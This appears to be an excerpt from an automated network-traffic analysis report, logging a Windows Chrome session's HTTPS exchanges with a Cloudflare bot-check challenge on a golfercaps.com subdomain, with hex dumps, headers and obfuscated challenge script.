                                                                  2024-12-30 21:42:17 UTC1369INData Raw: 30 74 6f 25 32 30 67 65 74 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 64 65 73 69 72 65 64 25 32 30 70 61 67 65 2e 25 32 30 41 6c 74 65 72 6e 61 74 69 76 65 6c 79 25 32 43 25 32 30 74 72 79 25 32 30 67 6f 69 6e 67 25 32 30 74 6f 25 32 30 74 68 65 25 32 30 72 6f 6f 74 25 32 30 6f 66 25 32 30 25 32 35 25 37 42 70 6c 61 63 65 68 6f 6c 64 65 72 2e 63 6f 6d 25 37 44 2e 22 2c 22 73 74 75 63 6b 5f 68 65 6c 70 65 72 5f 74 69 74 6c 65 22 3a 22 53 74 75 63 6b 25 32 30 6f 6e 25 32 30 74 68 69 73 25 32 30 70 61 67 65 25 33 46 22 2c 22 73 75 63 63 65 73 73 5f 74 69 74 6c 65 22 3a 22 56 65 72 69 66 69 63 61 74 69 6f 6e 25 32 30 73 75 63 63 65 73 73 66 75 6c 22 2c 22 6c 6f 63 61 74 69 6f 6e 5f 6d 69 73 6d 61 74 63 68 5f 77 61 72 6e 69 6e 67 5f 61 75 78 22 3a 22 54 68 65
                                                                  Data Ascii: 0to%20get%20to%20the%20desired%20page.%20Alternatively%2C%20try%20going%20to%20the%20root%20of%20%25%7Bplaceholder.com%7D.","stuck_helper_title":"Stuck%20on%20this%20page%3F","success_title":"Verification%20successful","location_mismatch_warning_aux":"The
                                                                  2024-12-30 21:42:17 UTC1369INData Raw: 72 75 6e 6e 69 6e 67 22 3a 22 56 65 72 69 66 79 25 32 30 79 6f 75 25 32 30 61 72 65 25 32 30 68 75 6d 61 6e 25 32 30 62 79 25 32 30 63 6f 6d 70 6c 65 74 69 6e 67 25 32 30 74 68 65 25 32 30 61 63 74 69 6f 6e 25 32 30 62 65 6c 6f 77 2e 22 2c 22 6a 73 5f 63 6f 6f 6b 69 65 73 5f 6d 69 73 73 69 6e 67 22 3a 22 45 6e 61 62 6c 65 25 32 30 4a 61 76 61 53 63 72 69 70 74 25 32 30 61 6e 64 25 32 30 63 6f 6f 6b 69 65 73 25 32 30 74 6f 25 32 30 63 6f 6e 74 69 6e 75 65 25 32 30 76 65 72 69 66 69 63 61 74 69 6f 6e 22 2c 22 62 72 6f 77 73 65 72 5f 6e 6f 74 5f 73 75 70 70 6f 72 74 65 64 22 3a 22 42 72 6f 77 73 65 72 25 32 30 69 73 25 32 30 75 6e 73 75 70 70 6f 72 74 65 64 25 32 30 61 6e 64 25 32 30 63 61 6e 6e 6f 74 25 32 30 63 6f 6d 70 6c 65 74 65 25 32 30 76 65 72 69 66
                                                                  Data Ascii: running":"Verify%20you%20are%20human%20by%20completing%20the%20action%20below.","js_cookies_missing":"Enable%20JavaScript%20and%20cookies%20to%20continue%20verification","browser_not_supported":"Browser%20is%20unsupported%20and%20cannot%20complete%20verif
                                                                  2024-12-30 21:42:17 UTC1369INData Raw: 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 7d 2c 22 70 6f 6c 79 66 69 6c 6c 73 22 3a 7b 22 74 75 72 6e 73 74 69 6c 65 5f 66 65 65 64 62 61 63 6b 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 74 69 6d 65 6f 75 74 22 3a 66 61 6c 73 65 2c 22 74 65 73 74 69 6e 67 5f 6f 6e 6c 79 5f 61 6c 77 61 79 73 5f 70 61 73 73 22 3a 66 61 6c 73 65 2c 22 66 65 65 64 62 61 63 6b 5f 72 65 70 6f 72 74 5f 6f 75 74 70 75 74 5f 73 75 62 74 69 74 6c 65 22 3a 66 61 6c 73 65 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6f 76 65 72 72 75 6e 5f 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 66 61 6c 73 65 7d 2c 22 72 74 6c 22 3a 66 61 6c 73 65 2c 22 6c 61 6e 67 22 3a 22 65 6e 2d 75 73 22 7d 3b 7e 66 75 6e 63 74 69 6f 6e 28 67 46 2c 65 4d 2c 65 4e
                                                                  Data Ascii: ssue%20persists."},"polyfills":{"turnstile_feedback_description":false,"turnstile_timeout":false,"testing_only_always_pass":false,"feedback_report_output_subtitle":false,"turnstile_overrun_description":false},"rtl":false,"lang":"en-us"};~function(gF,eM,eN
                                                                  2024-12-30 21:42:17 UTC1369INData Raw: 29 7d 2c 27 70 74 56 49 76 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 6b 43 73 57 41 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 4f 76 74 4e 4d 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 41 44 46 44 49 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 77 50 70 78 68 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 21 3d 69 7d 2c 27 48 78 6e 59 79 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 26 68 7d 2c 27 63 68 71 68 48 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 2a 68 7d 2c 27 4d 4f 61 6a 7a 27 3a 66
                                                                  Data Ascii: )},'ptVIv':function(h,i){return h<<i},'kCsWA':function(h,i){return h==i},'OvtNM':function(h,i){return h(i)},'ADFDI':function(h,i){return h==i},'wPpxh':function(h,i){return h!=i},'HxnYy':function(h,i){return i&h},'chqhH':function(h,i){return i*h},'MOajz':f
                                                                  2024-12-30 21:42:17 UTC1369INData Raw: 2c 31 29 3f 28 49 3d 30 2c 47 5b 67 49 28 35 30 33 29 5d 28 64 5b 67 49 28 37 31 33 29 5d 28 6f 2c 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 4d 3e 3e 3d 31 2c 73 2b 2b 29 3b 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 4f 3d 28 6a 26 36 35 35 33 35 2e 35 37 29 2b 28 36 35 35 33 35 26 43 29 2c 64 5b 67 49 28 36 35 30 29 5d 28 28 69 3e 3e 31 36 29 2b 64 5b 67 49 28 37 32 37 29 5d 28 6a 2c 31 36 29 2b 28 4f 3e 3e 31 36 29 3c 3c 31 36 2c 4f 26 36 35 35 33 35 29 3b 44 2d 2d 2c 64 5b 67 49 28 31 34 33 39 29 5d 28 30 2c 44 29 26 26 28 44 3d 4d 61 74 68 5b 67 49 28 39 31 37 29 5d 28 32 2c 46 29 2c 46 2b 2b 29 2c 64 65 6c 65 74 65 20 42 5b 43 5d 7d 65 6c 73 65 20 72 65 74 75 72 6e 20 46 5b 47 5d 5b 67 49 28 38 38 34 29 5d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 2c 27 70
                                                                  Data Ascii: ,1)?(I=0,G[gI(503)](d[gI(713)](o,H)),H=0):I++,M>>=1,s++);}else return O=(j&65535.57)+(65535&C),d[gI(650)]((i>>16)+d[gI(727)](j,16)+(O>>16)<<16,O&65535);D--,d[gI(1439)](0,D)&&(D=Math[gI(917)](2,F),F++),delete B[C]}else return F[G][gI(884)](function(){}),'p
                                                                  2024-12-30 21:42:17 UTC1369INData Raw: 3d 3d 68 3f 27 27 3a 64 5b 67 4a 28 31 30 33 34 29 5d 28 27 27 2c 68 29 3f 6e 75 6c 6c 3a 66 2e 69 28 68 5b 67 4a 28 31 31 32 38 29 5d 2c 33 32 37 36 38 2c 66 75 6e 63 74 69 6f 6e 28 69 2c 67 4b 29 7b 72 65 74 75 72 6e 20 67 4b 3d 67 4a 2c 68 5b 67 4b 28 31 34 30 35 29 5d 28 69 29 7d 29 7d 2c 27 69 27 3a 66 75 6e 63 74 69 6f 6e 28 69 2c 6a 2c 6f 2c 67 4c 2c 73 2c 78 2c 42 2c 43 2c 44 2c 45 2c 46 2c 47 2c 48 2c 49 2c 4a 2c 4b 2c 4d 2c 4c 29 7b 66 6f 72 28 67 4c 3d 67 47 2c 73 3d 5b 5d 2c 78 3d 34 2c 42 3d 34 2c 43 3d 33 2c 44 3d 5b 5d 2c 47 3d 6f 28 30 29 2c 48 3d 6a 2c 49 3d 31 2c 45 3d 30 3b 33 3e 45 3b 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 67 4c 28 39 31 37 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 64 5b 67 4c 28
                                                                  Data Ascii: ==h?'':d[gJ(1034)]('',h)?null:f.i(h[gJ(1128)],32768,function(i,gK){return gK=gJ,h[gK(1405)](i)})},'i':function(i,j,o,gL,s,x,B,C,D,E,F,G,H,I,J,K,M,L){for(gL=gG,s=[],x=4,B=4,C=3,D=[],G=o(0),H=j,I=1,E=0;3>E;s[E]=E,E+=1);for(J=0,K=Math[gL(917)](2,2),F=1;d[gL(
                                                                  2024-12-30 21:42:17 UTC1369INData Raw: 67 4c 28 39 31 37 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 67 47 28 37 31 32 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 46 28 36 36 32 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 67 54 2c 63 2c 64 2c 65 2c 66 29 7b 69 66 28 67 54 3d 67 46 2c 63 3d 7b 27 4e 46 43 79 42 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 68 21 3d 3d 67 7d 2c 27 49 73 46 49 70 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 2c 69 2c 6a 29 7b 72 65 74 75 72 6e 20 67 28 68 2c 69 2c 6a 29 7d 2c 27 46 6d 58 71 57 27 3a 66 75 6e 63 74 69 6f 6e 28 67 2c 68 29 7b 72 65 74 75 72 6e 20 67 2a 68 7d 7d 2c 64 3d 65 50 28 29 2c 65 3d 65 4d 5b 67 54 28 34 36 33 29 5d 28 65 52 28 64 29 29 2c 69 73 4e 61 4e 28 65 29 29 7b 69 66 28 63 5b 67 54 28 35 39 30
                                                                  Data Ascii: gL(917)](2,C),C++)}}},g={},g[gG(712)]=f.h,g}(),eM[gF(662)]=function(gT,c,d,e,f){if(gT=gF,c={'NFCyB':function(g,h){return h!==g},'IsFIp':function(g,h,i,j){return g(h,i,j)},'FmXqW':function(g,h){return g*h}},d=eP(),e=eM[gT(463)](eR(d)),isNaN(e)){if(c[gT(590
                                                                  2024-12-30 21:42:17 UTC1369INData Raw: 74 68 69 73 2e 68 5b 6b 5b 67 56 28 37 39 32 29 5d 28 74 68 69 73 2e 68 5b 6b 5b 67 56 28 37 39 32 29 5d 28 31 39 33 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 6b 5b 67 56 28 31 32 34 36 29 5d 28 6b 5b 67 56 28 31 31 36 31 29 5d 28 74 68 69 73 2e 68 5b 6b 5b 67 56 28 31 34 35 37 29 5d 28 31 39 33 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 67 56 28 31 34 30 35 29 5d 28 74 68 69 73 2e 68 5b 6b 5b 67 56 28 31 33 39 33 29 5d 28 31 39 33 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 2d 37 30 2c 32 35 36 29 2c 32 35 35 29 2c 31 33 33 29 5e 74 68 69 73 2e 67 5d 2c 4b 3d 74 68 69 73 2e 68 5b 74 68 69 73 2e 68 5b 6b 5b 67 56 28 31 35 34 34 29 5d 28 31 39 33 2c 74 68 69 73 2e 67 29 5d 5b 33 5d 5e 6b 5b 67 56 28 31 32 34 36 29 5d 28 6b 5b 67 56 28 38 36 33 29 5d 28 74 68 69
                                                                  Data Ascii: this.h[k[gV(792)](this.h[k[gV(792)](193,this.g)][3]^k[gV(1246)](k[gV(1161)](this.h[k[gV(1457)](193,this.g)][1][gV(1405)](this.h[k[gV(1393)](193,this.g)][0]++)-70,256),255),133)^this.g],K=this.h[this.h[k[gV(1544)](193,this.g)][3]^k[gV(1246)](k[gV(863)](thi


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.44974535.190.80.1443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:17 UTC486OUTPOST /report/v4?s=ulQbx3OJP6nXx0BIib9N6HdYIXGwmIVjIZHatCrEt7PC8cmZtHV4TtwWz6AtA1mmEEcTrKHtBQ1kcsFdjeun6Wt%2FDkRYhOOA5nVQOZ4E3G%2Bw4ikIhs847y6JkcwNyzGV8q8Zld6Suw%3D%3D HTTP/1.1
                                                                  Host: a.nel.cloudflare.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 398
                                                                  Content-Type: application/reports+json
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:17 UTC398OUTData Raw: 5b 7b 22 61 67 65 22 3a 33 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 36 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 33 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 62 73 33 32 63 2e 67 6f 6c 66 65 72 63 61 70 73 2e
                                                                  Data Ascii: [{"age":3,"body":{"elapsed_time":665,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":403,"type":"http.error"},"type":"network-error","url":"https://bs32c.golfercaps.
                                                                  2024-12-30 21:42:17 UTC168INHTTP/1.1 200 OK
                                                                  Content-Length: 0
                                                                  date: Mon, 30 Dec 2024 21:42:17 GMT
                                                                  Via: 1.1 google
                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                  Connection: close


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.449746188.114.96.3443888C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  2024-12-30 21:42:17 UTC1328OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/609964090:1735593069:6S3mpcqO1yILRgRXR0r0LjFCdbuSQ6cKt2unSWD0J4k/8fa532e0b89f421c/dHIAaNc3bgCsR5oKktnuJUphJqwfqu4osOi9Cn9zUWA-1735594936-1.2.1.1-hiLPnWAup5QiMMcYkqUgFSk0FeMKxRz.fwU8WEyUnAyFUxQygxfL_SCRekIkX5hP HTTP/1.1
                                                                  Host: bs32c.golfercaps.com
                                                                  Connection: keep-alive
                                                                  Content-Length: 4169
                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                  sec-ch-ua-mobile: ?0
                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                  sec-ch-ua-arch: "x86"
                                                                  Content-type: application/x-www-form-urlencoded
                                                                  sec-ch-ua-full-version: "117.0.5938.132"
                                                                  sec-ch-ua-platform-version: "10.0.0"
                                                                  CF-Chl-RetryAttempt: 0
                                                                  sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                                  sec-ch-ua-bitness: "64"
                                                                  sec-ch-ua-model: ""
                                                                  CF-Challenge: dHIAaNc3bgCsR5oKktnuJUphJqwfqu4osOi9Cn9zUWA-1735594936-1.2.1.1-hiLPnWAup5QiMMcYkqUgFSk0FeMKxRz.fwU8WEyUnAyFUxQygxfL_SCRekIkX5hP
                                                                  sec-ch-ua-platform: "Windows"
                                                                  Accept: */*
                                                                  Origin: https://bs32c.golfercaps.com
                                                                  Sec-Fetch-Site: same-origin
                                                                  Sec-Fetch-Mode: cors
                                                                  Sec-Fetch-Dest: empty
                                                                  Referer: https://bs32c.golfercaps.com/vfd23ced/
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  2024-12-30 21:42:17 UTC4169OUTData Raw: 76 5f 38 66 61 35 33 32 65 30 62 38 39 66 34 32 31 63 3d 7a 63 6c 73 50 73 35 73 34 73 46 73 36 73 77 39 74 62 39 74 79 55 6c 77 55 55 6a 55 61 45 74 2d 6c 74 7a 35 74 6c 67 41 42 68 65 52 74 30 35 52 49 32 76 74 66 45 78 79 74 56 73 6c 55 68 74 6f 4d 74 4c 41 49 78 69 42 73 78 45 57 4d 74 6f 68 78 42 74 42 6c 58 74 6d 35 52 63 6c 74 36 62 55 78 33 59 43 34 4d 72 74 2d 56 45 33 79 34 46 74 36 4a 50 41 6f 77 64 33 38 42 32 4f 76 79 6e 47 69 6a 74 6e 6c 30 36 36 46 74 6f 41 35 4f 74 78 6c 74 65 4d 68 32 4d 4c 39 58 74 4c 31 25 32 62 74 78 55 6f 76 6c 68 6c 47 62 2b 4f 45 2d 63 6c 68 31 2b 41 77 74 78 4c 41 6a 32 68 74 49 5a 41 74 41 65 70 74 6f 31 72 49 43 78 50 74 73 41 74 7a 50 49 57 45 74 35 58 62 6f 6c 74 76 4f 37 74 4e 32 72 6c 69 74 78 58 34 5a 49 74
                                                                  Data Ascii: v_8fa532e0b89f421c=zclsPs5s4sFs6sw9tb9tyUlwUUjUaEt-ltz5tlgABheRt05RI2vtfExytVslUhtoMtLAIxiBsxEWMtohxBtBlXtm5Rclt6bUx3YC4Mrt-VE3y4Ft6JPAowd38B2OvynGijtnl066FtoA5OtxlteMh2ML9XtL1%2btxUovlhlGb+OE-clh1+AwtxLAj2htIZAtAepto1rICxPtsAtzPIWEt5XboltvO7tN2rlitxX4ZIt
                                                                  2024-12-30 21:42:18 UTC890INHTTP/1.1 200 OK
                                                                  Date: Mon, 30 Dec 2024 21:42:17 GMT
                                                                  Content-Type: text/plain; charset=UTF-8
                                                                  Content-Length: 13584
                                                                  Connection: close
                                                                  cf-chl-gen: W+EURROJUbJzELkI+15NohDfQkCA5ZT1WMTA6/DsjGGZU9gLLSAZWbMz88JNWLmf7eMx2ojk8PM=$IvQqybdd2IUPJT2V
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XCh%2BiRfsAVD%2FOwnb%2FCWkGQKF0QX3juIJkD%2B%2F8nG7K6VFMdPpmI6kAaOZa0UUWXk4vE%2BICiUIvayHyhiWSbR%2BcVh1Dn4kAohmxcS0heeQ1BvF32dy0A%2FsMKvm4kMCWE3%2FX%2B926tF1rg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fa532ea5b45c33e-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1541&min_rtt=1509&rtt_var=630&sent=7&recv=10&lost=0&retrans=0&sent_bytes=2832&recv_bytes=6119&delivery_rate=1651583&cwnd=217&unsent_bytes=0&cid=0c537637888e6f40&ts=190&x=0"
                                                                  2024-12-30 21:42:18 UTC479INData Raw: 74 36 71 77 70 37 4f 38 64 4b 61 46 72 37 2b 35 72 38 47 33 76 72 35 35 65 38 37 52 6b 48 62 4f 77 63 65 2b 79 74 4f 4c 76 62 71 51 76 70 2b 4b 78 59 79 68 68 39 2f 53 32 4d 2f 62 35 4a 7a 4f 79 36 4c 50 73 4a 76 58 6e 62 4b 59 6d 5a 71 62 38 74 37 77 6e 39 2f 6b 36 4f 4c 6e 37 66 4c 6d 36 2f 30 44 71 38 6d 74 37 77 4c 33 42 77 44 34 41 77 6f 4b 38 73 6a 32 31 61 57 38 76 62 36 2f 46 77 4d 56 77 78 67 4c 46 51 7a 36 44 78 77 68 45 69 45 6a 7a 2b 33 52 46 43 59 63 4b 79 51 64 4a 79 34 75 46 2b 30 62 2b 63 6e 4b 34 65 4c 6a 35 43 38 74 35 2f 41 70 4c 6a 49 73 4d 54 63 38 4d 44 56 48 54 41 4e 45 52 6b 4a 4c 43 2f 6f 5a 47 68 76 2b 45 41 6f 43 58 75 33 75 42 67 63 49 43 51 6f 4c 44 41 31 4e 55 6c 5a 51 56 56 74 67 56 46 6c 72 63 42 6b 33 47 33 63 48 48 68 38
                                                                  Data Ascii: t6qwp7O8dKaFr7+5r8G3vr55e87RkHbOwce+ytOLvbqQvp+KxYyhh9/S2M/b5JzOy6LPsJvXnbKYmZqb8t7wn9/k6OLn7fLm6/0Dq8mt7wL3BwD4AwoK8sj21aW8vb6/FwMVwxgLFQz6DxwhEiEjz+3RFCYcKyQdJy4uF+0b+cnK4eLj5C8t5/ApLjIsMTc8MDVHTANERkJLC/oZGhv+EAoCXu3uBgcICQoLDA1NUlZQVVtgVFlrcBk3G3cHHh8
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 30 41 52 72 66 35 73 33 65 32 37 72 52 30 74 50 55 31 64 62 58 32 4e 6e 61 32 39 77 52 45 41 6f 53 2b 50 7a 6a 50 43 38 31 4c 44 68 42 2b 43 73 77 4e 43 34 7a 4f 54 34 79 51 30 56 4b 42 53 56 49 52 43 59 50 2f 41 76 2b 56 30 70 51 52 31 4e 63 46 45 5a 4c 54 30 6c 4f 56 46 6c 4e 58 6d 42 6c 49 45 74 41 4e 32 46 6e 4c 69 55 45 47 78 77 64 48 68 38 67 49 53 49 6a 4a 43 55 6d 66 6c 6c 5a 61 33 78 42 52 79 36 47 65 58 39 32 67 6f 74 44 64 58 70 2b 65 48 32 44 69 48 79 4e 6a 35 52 50 64 33 61 51 63 46 64 48 56 55 6d 68 6c 4a 71 52 6e 61 5a 65 6b 4a 57 5a 6b 35 69 65 6f 35 65 6f 71 71 39 71 74 49 2b 4d 72 33 46 75 54 57 52 6c 5a 6d 64 6f 61 57 70 72 62 47 31 75 62 37 32 62 75 4c 6d 4d 6a 33 62 4f 77 63 65 2b 79 74 4f 4c 76 63 4c 47 77 4d 58 4c 30 4d 54 56 31 39
                                                                  Data Ascii: 0ARrf5s3e27rR0tPU1dbX2Nna29wREAoS+PzjPC81LDhB+CswNC4zOT4yQ0VKBSVIRCYP/Av+V0pQR1NcFEZLT0lOVFlNXmBlIEtAN2FnLiUEGxwdHh8gISIjJCUmfllZa3xBRy6GeX92gotDdXp+eH2DiHyNj5RPd3aQcFdHVUmhlJqRnaZekJWZk5ieo5eoqq9qtI+Mr3FuTWRlZmdoaWprbG1ub72buLmMj3bOwce+ytOLvcLGwMXL0MTV19
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 48 79 6a 66 45 68 63 62 46 52 6f 67 4a 52 6b 71 4c 44 48 72 49 69 67 74 41 7a 4d 74 46 44 67 77 4c 7a 49 34 39 74 58 73 37 65 37 76 38 50 48 79 38 2f 54 31 39 76 63 64 4c 6c 51 6f 49 68 4d 5a 41 46 68 4c 55 55 68 55 58 52 56 48 54 46 42 4b 54 31 56 61 54 6c 39 68 5a 69 46 58 58 57 49 34 61 47 4a 4d 58 6c 49 70 43 42 38 67 49 53 49 6a 4a 43 55 6d 4a 79 67 70 4b 6c 31 4f 65 31 64 58 51 55 73 79 69 6e 32 44 65 6f 61 50 52 33 6c 2b 67 6e 79 42 68 34 79 41 6b 5a 4f 59 55 33 68 70 6c 6e 4a 79 58 46 67 33 54 6b 39 51 55 56 4a 54 56 46 56 57 56 31 68 5a 6f 72 4f 4b 67 48 4a 35 59 4c 69 72 73 61 69 30 76 58 57 6e 72 4c 43 71 72 37 57 36 72 72 2f 42 78 6f 47 38 7a 61 53 61 6a 49 56 6b 65 33 78 39 66 6e 2b 41 67 59 4b 44 68 49 57 47 71 37 33 65 75 70 79 6d 6a 65 58
                                                                  Data Ascii: HyjfEhcbFRogJRkqLDHrIigtAzMtFDgwLzI49tXs7e7v8PHy8/T19vcdLlQoIhMZAFhLUUhUXRVHTFBKT1VaTl9hZiFXXWI4aGJMXlIpCB8gISIjJCUmJygpKl1Oe1dXQUsyin2DeoaPR3l+gnyBh4yAkZOYU3hplnJyXFg3Tk9QUVJTVFVWV1hZorOKgHJ5YLirsai0vXWnrLCqr7W6rr/BxoG8zaSajIVke3x9fn+AgYKDhIWGq73eupymjeX
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 4e 2f 79 77 73 50 61 32 39 7a 64 33 74 2f 67 34 65 4c 6a 35 4f 55 39 4b 54 76 70 50 54 46 42 37 51 7a 76 39 2f 67 4f 33 66 54 31 39 76 66 34 2b 66 72 37 2f 50 33 2b 41 46 64 44 56 51 52 51 53 32 41 30 54 6c 67 4c 4b 51 31 5a 56 47 6b 66 58 6c 68 69 58 47 70 66 4d 78 6b 45 47 78 77 64 48 68 38 67 49 53 49 6a 4a 43 55 6d 66 57 6c 37 4b 6d 78 2b 66 31 70 30 66 6a 46 50 4d 33 57 48 69 45 57 45 66 6f 69 43 6b 49 56 5a 50 79 70 42 51 6b 4e 45 52 55 5a 48 53 45 6c 4b 53 30 79 54 6e 61 46 51 57 61 69 55 70 6c 57 66 6d 37 42 5a 64 31 74 73 65 46 36 6f 70 4c 6c 69 66 32 53 6d 75 4c 6d 55 72 72 69 47 62 4c 61 79 78 33 74 38 65 33 50 50 58 33 5a 33 65 48 6c 36 65 33 78 39 66 6e 2b 41 67 59 4b 44 68 49 58 59 7a 4e 79 4a 6c 61 69 4d 30 2b 44 65 33 62 54 61 31 4f 61 34
                                                                  Data Ascii: N/ywsPa29zd3t/g4eLj5OU9KTvpPTFB7Qzv9/gO3fT19vf4+fr7/P3+AFdDVQRQS2A0TlgLKQ1ZVGkfXlhiXGpfMxkEGxwdHh8gISIjJCUmfWl7Kmx+f1p0fjFPM3WHiEWEfoiCkIVZPypBQkNERUZHSElKS0yTnaFQWaiUplWfm7BZd1tseF6opLlif2SmuLmUrriGbLayx3t8e3PPX3Z3eHl6e3x9fn+AgYKDhIXYzNyJlaiM0+De3bTa1Oa4
                                                                  2024-12-30 21:42:18 UTC1369INData Raw: 76 74 35 69 55 7a 4e 44 49 32 44 6a 51 74 4e 78 67 73 4e 54 45 77 51 76 72 76 4e 44 6f 32 53 45 30 43 39 76 35 4f 54 41 68 45 50 6b 78 44 54 45 5a 55 43 67 30 67 37 77 63 49 43 51 6f 4c 44 41 30 4f 44 78 41 52 45 68 4d 55 46 52 5a 30 4a 42 6b 72 4b 79 55 34 43 42 38 67 49 53 49 6a 4a 43 55 6d 4a 79 67 70 4b 6e 52 79 4e 59 56 34 66 6e 57 42 69 6b 4a 33 5a 57 31 66 54 55 69 41 58 6d 57 50 62 31 5a 4a 53 5a 4b 55 6c 5a 57 5a 6e 4a 36 59 6c 4a 2b 68 6c 35 4a 64 6c 4b 47 68 71 4a 36 6b 72 4a 6d 74 6f 36 71 71 5a 47 64 6f 59 4c 78 4d 59 32 52 6c 5a 6d 64 6f 61 57 70 72 62 47 31 75 62 33 42 78 63 73 71 39 77 37 72 47 7a 34 66 4e 77 4e 43 78 78 38 7a 46 30 4e 66 58 6a 4d 76 62 31 63 76 64 30 39 72 61 6c 5a 65 50 36 33 75 53 6b 35 53 56 6c 70 65 59 6d 5a 71 62 6e
                                                                  Data Ascii: vt5iUzNDI2DjQtNxgsNTEwQvrvNDo2SE0C9v5OTAhEPkxDTEZUCg0g7wcICQoLDA0ODxAREhMUFRZ0JBkrKyU4CB8gISIjJCUmJygpKnRyNYV4fnWBikJ3ZW1fTUiAXmWPb1ZJSZKUlZWZnJ6YlJ+hl5JdlKGhqJ6krJmto6qqZGdoYLxMY2RlZmdoaWprbG1ub3Bxcsq9w7rGz4fNwNCxx8zF0NfXjMvb1cvd09ralZeP63uSk5SVlpeYmZqbn
